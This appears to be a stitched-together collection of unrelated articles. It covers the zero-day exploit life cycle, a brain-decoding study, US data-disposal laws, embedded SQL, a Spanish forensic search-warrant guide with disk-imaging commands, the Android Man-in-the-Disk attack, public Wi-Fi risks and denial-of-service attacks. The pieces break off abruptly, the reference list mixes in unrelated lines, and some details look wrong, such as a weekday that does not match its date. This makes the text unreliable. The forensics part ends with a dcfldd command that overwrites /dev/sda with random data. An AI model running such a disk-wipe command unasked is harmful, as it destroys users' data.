Once a zero-day vulnerability is discovered, the next stage is the development of the exploit. Cybercriminals or state-sponsored hackers often invest significant time and resources into crafting a reliable exploit that can take advantage of the vulnerability. This stage involves reverse engineering, code analysis, and testing to ensure the exploit can bypass existing security measures.

Example: The Stuxnet worm, which targeted Iran's nuclear facilities in 2010, was a sophisticated zero-day exploit that took advantage of multiple zero-day vulnerabilities in Windows systems. Its development was a highly complex and well-funded operation, believed to have been carried out by nation-states.

Stage 3: Weaponization and Deployment

After the exploit is developed, it enters the weaponization and deployment stage. In this phase, the exploit is integrated into malware, phishing emails, or other attack vectors and is then deployed against targeted systems. This stage is where the zero-day exploit begins to cause real damage, often leading to data breaches, system compromise, or even physical damage in the case of critical infrastructure attacks.

Example: In 2021, a zero-day vulnerability in Microsoft Exchange Server was exploited by the Hafnium group, resulting in widespread data breaches across multiple organizations. The attackers used the zero-day exploit to gain unauthorized access to email accounts, exfiltrating sensitive information.

Stage 4: Discovery by Security Teams

Eventually, security teams or researchers may detect the zero-day exploit, either through unusual system behavior, forensic analysis, or threat intelligence sharing. This stage is critical for initiating a response to the attack, but by this point, significant damage may have already occurred.

Example: The Log4Shell vulnerability, a zero-day exploit discovered in the Apache Log4j logging library in December 2021, was identified by security researchers after it had been actively exploited in the wild. The vulnerability allowed attackers to execute arbitrary code remotely, posing a severe threat to millions of devices globally.

Stage 5: Disclosure and Patch Development

Once the zero-day exploit is identified, the next step is disclosure. This involves informing the affected vendor or organization about the vulnerability so that they can develop a patch.
Responsible disclosure often involves working with cybersecurity organizations and government agencies to minimize the impact of the exploit before a patch is released.

Example: When Google Project Zero discovered a critical zero-day vulnerability in Windows 10 in 2020, they responsibly disclosed it to Microsoft. Microsoft then worked to develop and release a patch to protect users from potential exploits.

Stage 6: Deployment of Defenses

The final stage in the life cycle of a zero-day exploit is the deployment of defenses. This includes the release of patches, updates, and security advisories to users and organizations, as well as the implementation of additional security measures like intrusion detection systems, firewalls, and endpoint protection. During this stage the exploit's effectiveness diminishes as systems are fortified against the previously unknown threat.

Example: After the Equifax data breach in 2017, which stemmed from the exploitation of a vulnerability in the Apache Struts framework, organizations worldwide rushed to update their systems and improve their security posture to prevent similar incidents.

The life cycle of a zero-day exploit highlights the critical importance of proactive cybersecurity measures. While the discovery and development of these exploits are often beyond the control of individual organizations, staying vigilant, applying patches promptly, and utilizing advanced security tools can help mitigate the risk. Understanding this life cycle equips organizations with the knowledge needed to defend against one of the most formidable threats in the digital age.

References:
- Heartbleed Bug Analysis
- Stuxnet Worm: An In-Depth Analysis
- Microsoft Exchange Server Vulnerability
- Log4Shell Vulnerability Explained
- Google Project Zero and Windows 10 Vulnerability
- Equifax Data Breach Overview
- Earlier, considerable success was observed in this territory when implants were used.
- The researchers describe the method as non-invasive and the first of its type able to recognize streams of words as well as small groups of words or sentences.

Researchers at the University of Texas at Austin have combined artificial intelligence and fMRI scans to convert brain activity into continuous text. The findings were published in the journal Nature Neuroscience under the heading "Semantic reconstruction of continuous language from non-invasive brain recordings." The researchers described how this method is non-invasive and the first of its type able to recognize streams of words as well as small groups of words or sentences.

The decoder was trained by having participants listen to podcasts while being scanned by an fMRI scanner, a device that detects brain activity. This is a fascinating development because no surgical implants were involved. Each participant listened to 16 hours of podcasts while being scanned, and the decoder was taught to translate their brain activity into meaning using ChatGPT's predecessor, GPT-1. In essence, it evolved into a mind reader.

Earlier, considerable success was observed in this territory when implants were used. The technology might help people who have lost the use of their limbs, or who have lost the ability to speak, to virtually "write." Alexander Huth, a neuroscientist at the university, reported: "This isn't just a language stimulus. We're getting at meaning, something about the idea of what's happening. And the fact that that's possible is very exciting."

Though not perfect, tests demonstrated that the technology comes close to accurate decoding. For example, when the decoder heard, "I don't have my driver's license yet," it translated this to, "She has not even started to learn to drive yet." In other studies, participants watched videos with no sound at all, and this time the decoder could describe what they were seeing.

Although there is still much work to be done and the researchers occasionally encounter difficulties, other researchers in the field have praised the breakthrough as "technically extremely impressive." It may also be cause for worry: many applications of mind-reading beyond aiding the disabled can sound somewhat dystopian. Under the cover of its classified Project MKUltra, the CIA tried for many years to manipulate and read minds. Addressing this issue, one of the authors said, "We take very seriously the concerns that it could be used for bad purposes and have worked to avoid that. We want to make sure people only use these types of technologies when they want to and that it helps them."
Careless disposal of PII is subject to harsh legal penalties in many countries. Similarly, companies that do not have regimented processes for the retirement of technology and the data resident on it risk a loss of reputation, trust, and revenue. In the United States, there are several major laws that businesses need to remain aware of.

Privacy Act of 1974

The Privacy Act of 1974 sets out rights and restrictions on data held by government agencies, governing its collection, maintenance, use, and dissemination. Essentially, US federal workers must not wilfully disclose information to anyone not entitled to receive it.

The Fair and Accurate Credit Transactions Act (FACTA)

This law was passed in 2003 and its purpose is to enhance consumer protections, mainly those that protect against identity theft. While it meant that the amount of PII required from customers increased, it also gave more protection to that PII when gathered. Penalties for violations of FACTA vary, but wilful violations could amount to penalties running into the billions.

Gramm-Leach-Bliley Act (GLBA)

Also known as the Financial Modernization Act, this law was passed in 1999. It requires US companies to explain how they share and protect personal information and protects financial non-public personal information (NPI). Among other specifics, it means that businesses must apply special protections to private data in accordance with an information security plan. Punishments for GLBA non-compliance, once proven, are severe: individuals found in violation face fines of $10,000 for each violation discovered, while organizations face $100,000 for each violation.

Health Insurance Portability and Accountability Act (HIPAA)

HIPAA came into force in 1996 and covers information regarding health status, care, or payment, setting standards for covered parties and business associates. It applies only to protected health information (PHI). Any organization that houses this kind of data must protect it, during use and at disposal. Jail terms are possible and restitution may also need to be paid to affected individuals. However, the penalties brought forth depend on whether the breach was carried out with intent and the degree of negligence involved.

California Consumer Privacy Act (CCPA)

At least 35 states implement their own laws regarding data protection, and the CCPA is a well-known one. It has influenced other states to create similar laws, which have been implemented in areas such as Maryland, Rhode Island, and Massachusetts, among others. Taking effect in early 2020, the CCPA incorporates the foundational principles of the GDPR, mirroring its focus on data protection and privacy requirements. Penalties for violations of the CCPA vary, with fines of $2,500 for individual breaches and $7,500 for wilful individual breaches.

Similarly, both the Federal Trade Commission (FTC) and the Health Insurance Portability and Accountability Act (HIPAA) require the proper disposition of information.
When the Result Column Data Types Are Unknown

In most instances, when executing a dynamically defined SELECT statement, the program does not know the number or types of result columns. To provide this information to the program, first prepare and then describe the SELECT statement. The DESCRIBE statement returns to the program the type description of the result columns of a prepared SELECT statement. After the select is described, the program must dynamically allocate (or reference) the correct number of result storage areas of the correct size and type to receive the results of the select. If the statement is not a SELECT statement, DESCRIBE returns zero in sqld and no sqlvar elements are used.

After the statement has been prepared and described and the result variables allocated, the program has two choices regarding the execution of the SELECT statement:

• The program can associate the statement name with a cursor name, open the cursor, fetch the results into the allocated result storage areas (one row at a time), and close the cursor.

• The program can use EXECUTE IMMEDIATE, which allows you to define a select loop to process the returned rows. If the select will return only one row, it is not necessary to define the select loop.
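To illustrate the first choice, here is a minimal embedded-SQL/C style sketch of the prepare/describe/cursor flow described above. It is a sketch under assumptions, not code from this manual: error handling is omitted, the per-column buffer allocation is only indicated by a comment, and the descriptor fields shown (sqln, sqld, sqlvar) follow the conventional SQLDA layout.

exec sql include sqlda;
exec sql begin declare section;
    char stmt_buf[1024];   /* holds the dynamically built statement text */
exec sql end declare section;

/* Assume sqlda points to an allocated descriptor with sqln set to its capacity. */
exec sql prepare s1 from :stmt_buf;
exec sql describe s1 into :sqlda;

if (sqlda->sqld == 0) {
    /* Not a SELECT: execute the prepared statement directly. */
    exec sql execute s1;
} else {
    /* A SELECT: for each of the sqld result columns, allocate a storage
       area sized from sqlvar[i].sqltype and sqlvar[i].sqllen, and point
       sqlvar[i].sqldata at it (allocation omitted here). */
    exec sql declare c1 cursor for s1;
    exec sql open c1;
    while (1) {
        exec sql fetch c1 using descriptor :sqlda;
        if (sqlca.sqlcode != 0)
            break;          /* no more rows, or an error */
        /* process the row through sqlvar[i].sqldata ... */
    }
    exec sql close c1;
}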
First published January 2010

The expert witness perspective, by Joaquim Anguas

This article describes the most common schema and basic procedure by which search warrants related to computer evidence are served in Spain, from the expert witness perspective, and presents a guide, concrete tools, commands, and recommendations oriented to maximizing the effectiveness and validity of the action.

Procedural law in Spain allows the introduction of facts into a conflict in the form of "expert witness proof" (prueba de peritos). In the Spanish legal system, an expert witness is someone who has expert knowledge on a matter related to the case. They can be appointed by the court or by the parties in conflict. They issue their results in writing and are usually questioned during the trial.

In Spain, a search warrant is a court commission to search for evidence related to a case. Warrants are usually produced in criminal procedures, but Spanish law also allows them as precautionary measures in intellectual property, patent, or unfair competition cases. A group of persons led by the court clerk to serve a court commission is called a "comisión judicial". In the case of search warrants it is constituted by the court clerk together with law enforcement personnel and/or the expert witness(es) if needed. The court clerk attests the action, because he/she can act as a legal authority, and takes detailed minutes of the whole procedure.

In Spain, expert witnesses can be appointed by the court to serve search warrants. In civil litigation these actions are usually precautionary measures derived from unfair competition actions. In penal prosecution they usually act in less serious crimes, such as the discovery and revelation of secrets. When law enforcement's specialized units (terrorism, drugs, economic crime, etc.) are investigating more serious crimes, they don't rely on expert witnesses but usually get coverage from their own units (scientific police).

Depending on how the judge envisions the action, constrained by how the party or the attorney requests it, expert witnesses either receive an assignment to act as assistants to law enforcement or instead get the required coverage from law enforcement to guarantee the action's effectiveness. The first case would correspond to a situation in which there is a current investigation in place, and the second could correspond to precautionary measures requested by the plaintiff. In any case, it is advisable to let law enforcement do their job as long as it does not interfere with the court assignment.

Expert witnesses have to be, and remain, independent and impartial during the case. They must disclose any detail that may compromise their independence and/or impartiality and refrain from acting in any action in which they have any kind of interest.

The court commission must specify in detail what is being searched for and what means can be used to serve it. It may include file names, examples of file contents, file hashes (MD5, SHA), and whether it allows the search and/or seizure of computers, optical media, etc. An expert witness appointed to serve a search warrant will have to answer for the outcome of the action and needs to plan it well, because this kind of duty does not forgive errors easily.

In non-computer-related actions, serving a search warrant is a one-step activity. But in this case of study, computer evidence oriented search warrants, the action has to be performed in multiple steps:

1. Material acquisition in the place where the search warrant is served.
2. In-court storage media imaging.
3. Expert witness analysis and result presentation.

The reason the action is split into different steps is that media imaging and analysis are time-intensive tasks, and tactical and practical issues recommend agility in the service of the search warrant. Steps 1 and 2 are performed under the court clerk's legal authority and control. After reviewing the results presentation, the court may require further iterations of step 3.

This article is structured as follows:

– Basic procedure. It explains how the action is performed.
– Recommendations. Some recommendations regarding how to serve the commission.
– Tools and commands. A review of some effective tools and commands. There are different good approaches to this, but this article focuses on the use of a computer forensics distribution to boot the target computer and perform the cloning. The directory and file names in the proposed examples have been redacted, but results come from real data.

Basic procedure

Search warrants are usually served by what is called a "comisión judicial". In the proposed scenario it consists of:

– A judicial clerk. He/she will inform those receiving the warrant and take detailed minutes of every action performed to serve it. S/he acts as a legal authority and can attest the action.
– Law enforcement agents. Some of them are agents who have prepared the tactics of the action (identification of persons of interest and places, the best time to conduct the action, etc.) and some are from specialized units conducting the investigation of the acts being prosecuted.
– One or more expert witnesses. At least one of the expert witnesses is appointed directly by the court. The plaintiff may be allowed to appoint an expert witness himself/herself, but s/he has to be properly empowered to be allowed to attend the action. In any case s/he may raise concerns or questions that can get transcribed to the minutes but will NOT be allowed to intervene directly in the action.

The "comisión judicial" is constituted when all those appointed by the court are present and the judicial clerk starts taking the minutes. Once in the place where the warrant is to be served, law enforcement gets access to the place and identifies the person of interest to receive it. The judicial clerk informs him/her about the circumstances that trigger the action, his/her rights, what is going to be searched, and how the action is going to be deployed.

The person of interest is asked for computers, storage media, or devices that may contain what is being searched for. If s/he provides this information, this fact is verified by the expert witness in front of him/her and the judicial clerk, and everything is documented in the minutes. In any case all suspicious media, devices, or computers are seized by the expert witness and documented in the minutes, always being proportional, observing the rights of the person receiving the action, and obeying what the judge allowed in the search warrant. All seized material is left in an in-court deposit.

In-court disk clone

Later, the expert witness makes an image copy of the seized material for analysis. The respondent is informed when the copy is being performed and is allowed to get a copy at his/her own expense. The image copy is performed in front of the judicial clerk, who takes minutes of the actions performed. Once the copy is finished, all seized material returns to the in-court deposit.
Analysis and result presentation

The expert witness performs the required analysis of the imaged material and presents a report to the court that documents the whole process, from the commission's constitution to the final result, including all the details that may allow someone else to reproduce the findings. It is very important that no information unrelated to the search warrant is disclosed in the result presentation, as this may affect the rights of the person suffering the action. It is better to make indications regarding the possible outcome of further analysis and get confirmation from the court before conducting it than to release information that may affect the rights of the person suffering the measure.

It is very important to always keep in mind what the assignment says and what it does not. It has to be clear and complete, and if it is not, it is better to seek clarification or raise any concerns to the court in writing. Also, during the action and the results presentation, the rights of the person receiving the action have to be kept, and the means, actions performed, and possible consequences have to be proportional.

Recommendations

Preparation is the key to success, because during the action there is not much room for improvisation.

1. Get all the information you can regarding the systems you are going to search and/or seize, and plan the tools, devices, and commands you are going to need to serve the commission. Law enforcement agents or the documentation included in the court proceedings may help you get the case background.
2. Ask the plaintiff (if it is the case) how to identify the object of the search. It is advisable to get access only to the minimum amount of information that identifies the object of the search. If you are searching for a PDF document, the document's name and the file hash are enough.
3. If you are not familiar with the tools, devices, or commands you may need to use, you should not be serving the court commission. If you don't feel confident, talk to the judge and let someone else with the needed skills do the job.
4. If you do feel confident, practice, practice, practice: set up a test environment and perform the planned actions on it until you feel you can perform them without risk in a hostile environment. Take into account all possible variations that may appear and be prepared for the unexpected.
5. Prepare checklists in advance for the material and actions.
6. Try to get in contact with the law enforcement personnel serving the action with you. Tell them what your plan is. Listen to them and raise any concerns you may have in advance. Don't leave anything that may result in a surprise during the action.
7. Get a good rest the night before the action. You'll need to be alert and agile to respond to the problems you will encounter.

Law enforcement usually brings thin rubber gloves and anti-tampering labels and bags, but you are advised to bring your own just in case. It is advisable to bring material that gives you some assurance of being able to respond to eventualities, but not too much: a heavy load will tire you and reduce your mobility and agility. You are not supposed to need all of these, but just in case:

– Mobile access to the Internet in case you have to search for or download something.
– Some forensics distributions in CD and USB format.
– A cloning device or an IDE/SATA to USB adapter.
– One or more computers (they don't need a hard drive because you'll boot them from the forensics distribution if needed).
– A power strip.
– An Ethernet cable.
– A multitool.
– Some storage media.
– A camera, replacement batteries, and its connection cable.
– A crossover Ethernet cable.
– A flashlight.
– A cloth and/or paper tissues.

There are different opinions on this, but I prefer acting in my usual work wear: a suit. Of course you need to feel comfortable working in a suit and expect that you may have to deal with dusty computers and devices, but if you can get used to it, in my humble opinion, wearing a suit may help.

You are going to get into a place and/or a system the user may not want you in. Getting you access to the place or system and letting you serve the warrant is law enforcement's mission. Let them do their job. Fortunately, in countries that are ruled by law, citizens' rights are preserved: the person suffering the action will have a way to defend his/her point in front of a court.

Your presence and attitude have an influence on how the person receiving the action behaves and, what is more important, the way s/he reacts to it and cooperates or otherwise tries to block the action. My advice is to keep a straight face (poker face, not angry), be polite and respectful but firm, show a calm, self-confident attitude, go straight to work, and keep in general a neutral professional attitude. In my experience, you usually get what you want if you ask politely. The person receiving the action may be placed under arrest so s/he can be questioned in law enforcement offices. Some take it easy (usually those more used to it), but others don't. Keep in mind that it is not your fault; your only goal is to serve your assignment while keeping the rights of the parties. If you see any irregularity, you can address the issue in the minutes or in your report to the court.

Passwords and encryption keys

There might be password-protected computers or devices, and you may need encryption keys to be able to read the content and perform the commissioned analysis of the seized media. If the computers are turned on, review them for encrypted disks or directories and request the encryption keys or passwords. Take a dump of the RAM.

Tools and commands

While there are multiple valid approaches to this, I will focus on booting from a computer forensics distribution for the actions of cloning and analyzing the seized media, and on using an IDE/SATA to USB adapter. In my experience this is a flexible, solid, and convenient approach. Performance is about 80 GB/hour. If you serve search warrants frequently you may consider getting a disk cloner; performance for a cloner is about 250 GB/hour.

Media clone in court

There are two approaches to the cloning: if you only seized the disks but not the complete computer, you'll have to connect them to a cloner or an adapter. If you got the whole computer, you may boot it into a forensics distribution and perform the cloning. Most storage media needs disassembly. In the days between the action and the disk clone in court, get all the service manuals of the devices or computers you may have to disassemble.

The cloning is planned in advance and the parties can attend and get their own copy. Get to the court on time. The court clerk receives you in court and starts the cloning minutes. S/he gets or requests the computers, devices, or storage media from the in-court deposit. Depending on the cloning option you prepared, boot the cloning computer or the cloner.
If needed, in front of the court clerk, extract the disks from the computer, device or enclosure and process them one by one, taking careful minutes of your actions. Have the court clerk check the computer time and copy the hashes into the minutes. Once finished, sign the minutes; the court clerk takes the devices back to the in-court deposit.

Command and options

It is recommended to issue a "date" command before and after the cloning command for reference. The command "dcfldd" is an improvement on "dd" and is used to clone devices. It copies the contents of the whole device: not only the data on it, but also the free space.

"conv=sync,noerror" tells the command not to stop on errors and, where errors occur, to pad the output with zeros so no "holes" are left in the resulting image. "hashwindow=0 hashlog=file.txt" calculates a single hash over the whole operation on the fly and writes it to file.txt; the default algorithm is MD5, and adding "hash=sha256" switches it to SHA-256.

ubuntu@ubuntu:~$ date; sudo dcfldd if=/dev/sdc of=/media/disk/CASE_ID/LOCATION_ID/DEVICE_ID.dd conv=sync,noerror hashwindow=0 hashlog=DEVICE_ID_md5.txt; date
Thu Nov 16 13:18:22 UTC 2009
4883968 blocks (152624Mb) written.
4884090+1 records in
4884091+0 records out
Thu Nov 16 15:26:34 UTC 2009

Where CASE_ID is the case identification, LOCATION_ID identifies the location where the media was seized, and DEVICE_ID is the device identification.

Get partition information

The result of a "dcfldd" command can be mounted as a loop device. Disk images may contain more than one partition each, and in order to mount one via loopback you need to know the starting byte of every partition. You can use the command "parted" to list the starting bytes of the partitions in a "dcfldd" image file: start "parted", set the unit to bytes, and print the partition table.

ubuntu@ubuntu:/media/disk/CASE_ID/DEVICE_ID$ parted DEVICE_ID.dd
WARNING: You are not superuser. Watch out for permissions.
Warning: Unable to open /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd read-write (Permission denied). /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd has been opened read-only.
GNU Parted 1.7.1
Welcome to GNU Parted! Type 'help' to view a list of commands.
(parted) unit
Unit?  [compact]? B
(parted) print

Disk /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd: 30005821439B
Sector size (logical/physical): 512B/512B
Partition Table: msdos

Number | Start        | End          | Size         | Type     | File system | Flags |
1      | 8225280B     | 10487231999B | 10479006720B | extended |             | lba   |
5      | 8257536B     | 10487231999B | 10478974464B | logical  | ntfs        |       |
2      | 10487232000B | 29997596159B | 19510364160B | primary  | ntfs        | boot  |

The numbers in the "Start" column are the input for the "mount" command when mounting each partition. As said, in order to mount the result of "dcfldd" you need to provide the starting byte of the partition, taken from the "parted" output.

ubuntu@ubuntu:/media/disk/CASE_ID/DEVICE_ID$ sudo mount -r -o loop,offset=10487232000 -t ntfs DEVICE_ID.dd /media/DEVICE_ID

This mounts, read-only, the NTFS partition that starts at byte 10487232000.

It is better not to be unnecessarily exposed to the contents of the seized media. It is normally useful to create a list of all the disk contents with their MD5 hashes calculated, so you can search this file without having to see the rest of the disk.

ubuntu@ubuntu:/media/DEVICE_ID$ find . ! -type d -print0 | xargs -0 md5sum | tee /media/disk/CASE_ID/LOCATION_ID/DEVICE_ID-PARTITION_ID.md5

This calculates the MD5 hash of every file in the partition.
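Once this per-file hash list exists, the object of the search can be located without browsing the rest of the disk. A small sketch, assuming you were given the target document's MD5 hash in advance (the hash below is just a placeholder):

# Search the hash list for the reference hash supplied with the warrant
grep -i 'd41d8cd98f00b204e9800998ecf8427e' /media/disk/CASE_ID/LOCATION_ID/DEVICE_ID-PARTITION_ID.md5

A match prints the hash together with the file path, which can be copied directly into the minutes or the report.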
– There’s a final judgment (res judicata). After the report is presented and while the case is not closed, it is advised to move all data to secondary encrypted storage. ubuntu@ubuntu:/$ sudo dcfldd if=/dev/urandom of=/dev/sda statusinterval=10 bs=10M conv=notrunc This fills the device /dev/sda (the device you want to erase) with random data.
Man-in-the-Disk is a new attack technique that targets Android applications whose use of external storage is insufficiently protected. Attackers take advantage of careless storage handling in third-party applications to tamper with app data or even crash a victim's Android device. The technique targets the way smartphones and most mobile devices handle shared storage, which does not benefit from Android's sandbox protections.

Researchers from Check Point reported vulnerabilities in how Google's Android OS uses external storage resources. The problem usually arises when developers are careless about where they store app data. External storage is essentially a partition on the device's storage that is shared by all applications, and Man-in-the-Disk targets exactly this shared external storage. "Failing to employ security precautions on their own leaves applications vulnerable to the risks of malicious data manipulation," the team says.

Some apps fall back to external storage when there is not enough free internal storage available on the device. Google advises developers to validate data read from external storage, and says that files should be signed and cryptographically verified before being loaded dynamically. Some researchers have ironically pointed out that Google does not always follow its own guidelines, since many apps, once downloaded, update themselves or receive data from developer servers. Because external storage may be prioritized, this data can pass through external storage before entering the app itself. That window allows man-in-the-disk attacks to monitor an app's online communication with its servers and to tamper with the data in transit.
It can be tempting to connect to the internet using public Wi-Fi networks. Tempting, but potentially a huge mistake: there are quite a few hazards associated with public Wi-Fi. If you want to protect yourself from all sorts of unpleasant possibilities, be extra careful about public networks and avoid them if at all possible. Don't forget that it's better to be safe than sorry.

Networks That Are Unencrypted

Unencrypted networks pose a serious problem for anyone who connects while out and about. Encryption protects information: if the data traveling between a wireless router and a computer is encoded, outside parties cannot make sense of it. On a public network, you often have no reliable way to confirm whether your traffic is actually protected, which should give you pause. If you don't want to worry about others getting hold of your information, insist on encrypted connections, something public networks frequently cannot guarantee.

The Headaches of Malware

Malware is, and has long been, a huge headache for anyone concerned with cyber security. Attackers can effectively plant malware on other people's computers, and public Wi-Fi is one of the easier delivery routes. A software program or operating system with unpatched weaknesses is an open invitation: hackers write code that zeroes in on those specific weak points, and that is how they place malware straight onto other people's devices.

Questionable Hotspots

There are many questionable hotspots out there at this moment. These hotspots scam people into joining networks that are in no sense credible. A name that gives off an air of authenticity can spell bad news: names are simple to imitate, so never put your confidence in a network just because its name looks legitimate. If you see the name of a famous corporation, don't assume the network is actually tied to it; it could be fraudulent.

Password Theft

People depend on passwords for all sorts of online tasks, day in and day out, and it is a disaster to realize that a hacker has captured yours for some questionable purpose. If you want to protect yourself from password headaches of that kind, steer clear of public Wi-Fi networks.

Looking for more cybersecurity tips to help keep you and your devices safe online? Contact the experts at tekRESCUE, a cybersecurity company near Austin, TX, to learn how we can help.
Denial of service attacks pose a significant threat to online services, with the power to disrupt and disable critical operations. This guide covers the tactics attackers use and the motivations behind them, and provides actionable strategies to fortify your network against these insidious threats.

Exploring the Mechanics of Denial of Service (DoS) Attacks

At the heart of a DoS attack lies a simple yet devastating goal: to render a machine or network resource unavailable, plunging online services into the dark. These attacks, characterized by their sudden and unannounced onset, can strike like a bolt from the blue, leaving services inaccessible and users in disarray. Whether by flooding services with a deluge of excessive traffic or by exploiting vulnerabilities to trigger a crash, the mechanics of DoS attacks are as varied as they are harmful.

Comprehending the strategies behind these disruptions is comparable to a military general analysing the tactics of an adversary. From overload-based attacks that sap server memory and CPU power to sophisticated methods that cripple a system's ability to process legitimate requests, the arsenal used in DoS attacks is both broad and insidiously creative. A deeper dive into these mechanisms sheds light on their operation and provides valuable insights for strengthening our defences against them.

The Flood: Overwhelming Traffic Tactics

In the realm of DoS, flood attacks are a brute-force tactic, aiming to submerge a server's capacity under waves of attack traffic so that no room is left for legitimate users to get through. Imagine legions of soldiers charging a fortress, the sheer number of attackers forcing the gates open. In the digital world, this is mirrored by SYN flood attacks, where attackers barrage a server with connection requests and then ignore the server's attempts to respond, quickly depleting the pool of available connections.

Another notorious strategy is the Smurf attack, a cyber equivalent of a malicious echo. Here, attackers send a barrage of ICMP packets with a falsified return address to network broadcast addresses. The network unwittingly amplifies the traffic by having every device respond, creating a torrent of data aimed back at the victim's server and overwhelming it to the point of paralysis.

Exploitation of Weaknesses

While flood attacks pound at the gates, other DoS tactics are more akin to a lock-picker, exploiting vulnerabilities to infiltrate and incapacitate systems. Attacks such as Teardrop and the notorious ping of death send malformed payloads that confuse and overwhelm the target, causing system crashes or resource exhaustion.

These insidious assaults target the very fabric of network communication protocols, such as TCP in Shrew attacks, or exploit security vulnerabilities to compromise remote management interfaces in Permanent Denial of Service (PDoS) attacks. In many of these cases, the attacker triggers the denial of service simply by sending oversized or mangled packets that the system cannot handle, manipulating the system's data handling into a crash. This underscores the critical importance of robust system software and responsive security measures, and the necessity of vigilance and proactivity in cybersecurity.
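One quick way to spot the SYN-flood pattern described above on a Linux server is to count half-open connections; a count far above your normal baseline suggests a flood rather than legitimate load. A rough sketch (column positions can vary slightly between ss versions):

# Count TCP connections stuck in the half-open SYN-RECV state
ss -tn state syn-recv | wc -l

# List the claimed source addresses behind them (often spoofed in a real flood)
ss -tn state syn-recv | awk 'NR>1 {split($4,a,":"); print a[1]}' | sort | uniq -c | sort -rn | head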
Malicious Traffic Management

The management of malicious traffic in DoS attacks is a dark art, in which attackers meticulously craft and direct spoofed packets to disrupt their targets. This cyber treachery can take the form of nuke attacks that use invalid ICMP packets to cause mayhem, or DNS amplification attacks that exploit public DNS servers to magnify the assault. Like an orchestra conductor, the malicious actor arranges the flow of attack traffic to maximize disruption. However, it's not all doom and gloom: defenders have tools at their disposal, such as upstream traffic filtering, rate limiting, and behavioural anomaly detection, all of which are covered later in this guide.

The Motivations Behind Launching DoS Attacks

While it's vital to understand the mechanics of DoS attacks, it's equally informative to comprehend their underlying motivations. Attackers launch these digital sieges for reasons that range from financial extortion and ideological differences to personal grudges and the urge to show off, and the goals behind such an attack are as diverse as the methods employed.

The chaos that ensues during a DoS attack can serve as a smokescreen, allowing attackers to infiltrate systems while inflicting financial damage that can average tens of thousands of dollars per hour during a DDoS attack. Beyond the immediate impact, DoS attacks can be deeply personal or ideological, serving as a proving ground for attackers to flaunt their technical prowess to their peers. Understanding these diverse motivations is not just an academic exercise; it's a cornerstone of effective cybersecurity, enabling better defences and aiding in the identification of the responsible parties.

The Role of Botnets in Amplifying Attacks

When it comes to amplifying the destructive force of a DoS attack, botnets are the weapon of choice for cybercriminals. These networks of compromised personal devices are like sleeper cells, awaiting commands to unleash a deluge of fake requests and spam on other devices and servers. By commandeering the processing power of thousands or even millions of bots, attackers can magnify the scale of a DDoS attack to catastrophic levels.

Botnets can be controlled through a centralised server or a peer-to-peer model, offering resilience against countermeasures. They are built for a range of purposes, from activism to state-sponsored attacks, and the cost of hiring botnet services is alarmingly small compared to the scale of damage they can cause. Notably, the infamous Sony PlayStation Network DDoS attack used a botnet comprised of IoT devices, chosen for their computational capabilities and often lax security, highlighting the importance of securing all networked devices against such threats.

Identifying a DoS Attack: Signs and Symptoms

Identifying the symptoms of a DoS attack parallels diagnosing a disease; early detection improves the chances of lessening its impact. Common symptoms include unusually slow network performance, the unavailability of a particular website, or an inability to reach any online resources, and they can serve as early warning signals of an ongoing attack.

Distinguishing between a genuine surge in legitimate traffic and a DoS attack is not trivial; it requires vigilance and an understanding that these symptoms often indicate something far more sinister than routine network issues. By staying alert to such signs and investigating them promptly, organizations can avoid the steep costs of dismissing an actual attack as a harmless traffic increase.
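When these symptoms appear on a web service, a useful first triage step is to check whether a handful of sources dominate recent traffic. A rough sketch against a web server access log (the log path and format are assumptions; adjust them for your server):

# Top ten client IPs in the access log; one address towering over the rest is suspicious
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head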
Traffic Anomalies and Performance Degradation

Traffic anomalies and performance degradation are the tell-tale signs of an ongoing DoS attack. When your digital domain suddenly slows to a crawl for routine tasks, it's time to consider the possibility of an attack. An inability to access certain online resources, or a slowdown in the progress of requests, are clear indicators of performance problems stemming from malicious activity.

To effectively differentiate attack traffic from normal network traffic, sophisticated detection techniques such as Network Behavioural Analysis (NBA) are employed. These systems analyse traffic over time, establish a baseline, and identify abnormal patterns that could suggest an ongoing attack. Some attacks, like degradation-of-service or HTTP slow POST attacks, aim to slow websites down rather than crash them; their detection remains a challenge that demands advanced analytics and a keen eye for anomalies.

Disrupted Connectivity and Service Availability

The hallmark of a DoS attack can be as straightforward as the complete unavailability of a website or an inability to access any online resources, signalling a clear disruption of service. When users are suddenly stripped of their ability to access important web-based accounts and services, it's a symptom that can't be ignored. Multiple devices across the same network experiencing connectivity interruptions could all be victims of a DoS attack, emphasising the need for a unified defence strategy.

Sometimes the impact of a DoS attack extends beyond the direct target and affects entire networks. An organisation's internet service provider (ISP) might also fall prey to such attacks, leading to a loss of service for the organisation even if it is not the direct target. This ripple effect underscores the importance of cooperative defences and of robust communication channels with service providers.

Comparing DoS and DDoS: Understanding the Differences

DoS and Distributed Denial of Service (DDoS) attacks are often mentioned in the same breath, yet they have distinct characteristics that set them apart. A DoS attack typically unleashes its fury from a single computer and internet connection, directing a flood of traffic at a server. A DDoS attack, by contrast, is the combined effort of multiple systems (a botnet) working in concert to launch a synchronised assault on a single target.

The power of a DDoS attack lies in its numbers; with many devices contributing, it can overwhelm a target's resources in a more potent and sustained manner than a single-source DoS attack. DDoS attacks are also notoriously difficult to counteract because of their distributed nature, which makes isolating the attack source a formidable challenge.

Scale and Complexity

The scale and complexity of a DDoS attack are what make it particularly menacing. With the potential to generate gigabits or even terabits of data per second, the volume of attack traffic a DDoS can unleash dwarfs that of a DoS attack, and the simultaneous generation of traffic from multiple systems lets it overwhelm target systems far more quickly and effectively.

DDoS attacks are not just about volume; they're about coordination. Their complexity is magnified by the use of many compromised devices forming a botnet, orchestrated by a central command-and-control server. This organisational structure enables a level of sophistication and adaptability that makes DDoS attacks particularly challenging to defend against.
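Because a DoS attack comes from a single source while a DDoS comes from many, counting the distinct remote addresses currently connected gives a crude first read on which one you are facing. A sketch for a Linux host serving HTTPS (the port is an assumption, and the parsing below assumes IPv4 peers):

# Number of distinct peers connected to port 443
ss -tn 'sport = :443' | awk 'NR>1 {split($5,a,":"); print a[1]}' | sort -u | wc -l

A single dominant peer points to a DoS; hundreds or thousands of distinct peers during an outage point to a DDoS.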
